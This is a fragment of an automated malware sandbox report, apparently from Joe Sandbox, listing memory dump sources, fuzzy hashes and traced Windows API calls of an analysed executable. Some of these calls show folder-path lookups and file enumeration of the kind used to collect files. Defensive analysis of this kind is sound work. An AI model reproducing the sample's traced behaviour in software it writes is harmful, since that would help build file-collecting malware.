                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: d700ced01e987019b64f62c3b541f8d634bc034214b9f58152b43361bde30a87
                        • Instruction ID: ecb15aba6eee0ffb3dc31b384fc9c59831770469808aef2dcd32655a6ef74802
                        • Opcode Fuzzy Hash: d700ced01e987019b64f62c3b541f8d634bc034214b9f58152b43361bde30a87
                        • Instruction Fuzzy Hash: 68F01935E40209ABDB10DBE0DC49BAE77F9EB58750F10C254F655E72D4D77496018B40
                        APIs
                        • __getptd.LIBCMT ref: 0087C74E
                          • Part of subcall function 0087BF9F: __amsg_exit.LIBCMT ref: 0087BFAF
                        • __getptd.LIBCMT ref: 0087C765
                        • __amsg_exit.LIBCMT ref: 0087C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0087C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 7c5133266ac7c7ddd4cf82bbf2569ba891b5c64a0bc588005da80f357e870ba0
                        • Instruction ID: d75c9b472fd0b5b68020738e703b39d61a52bfef14cd8d229d57ff3e6ed4cc1f
                        • Opcode Fuzzy Hash: 7c5133266ac7c7ddd4cf82bbf2569ba891b5c64a0bc588005da80f357e870ba0
                        • Instruction Fuzzy Hash: F6F044329016109AD728BBBC9846B4E33A1FB40B60F24C14DF41CE72EACF68D9409A57
                        APIs
                          • Part of subcall function 00878DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00878E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00874F7A
                        • lstrcat.KERNEL32(?,00881070), ref: 00874F97
                        • lstrcat.KERNEL32(?,01169658), ref: 00874FAB
                        • lstrcat.KERNEL32(?,00881074), ref: 00874FBD
                          • Part of subcall function 00874910: wsprintfA.USER32 ref: 0087492C
                          • Part of subcall function 00874910: FindFirstFileA.KERNEL32(?,?), ref: 00874943
                          • Part of subcall function 00874910: StrCmpCA.SHLWAPI(?,00880FDC), ref: 00874971
                          • Part of subcall function 00874910: StrCmpCA.SHLWAPI(?,00880FE0), ref: 00874987
                          • Part of subcall function 00874910: FindNextFileA.KERNEL32(000000FF,?), ref: 00874B7D
                          • Part of subcall function 00874910: FindClose.KERNEL32(000000FF), ref: 00874B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: cd0cb829e5e92dfdc320906cd1af332837e4469b18a07cdf7fddb13da92271f6
                        • Instruction ID: 5000d4a5e19a3fe95f83ce8a64d73156524466430b933869d823017eff0352ba
                        • Opcode Fuzzy Hash: cd0cb829e5e92dfdc320906cd1af332837e4469b18a07cdf7fddb13da92271f6
                        • Instruction Fuzzy Hash: CA21A376900205A7CB94FBA4DC4AEED737CF769300F004554B65AD2185EF749AC9CB93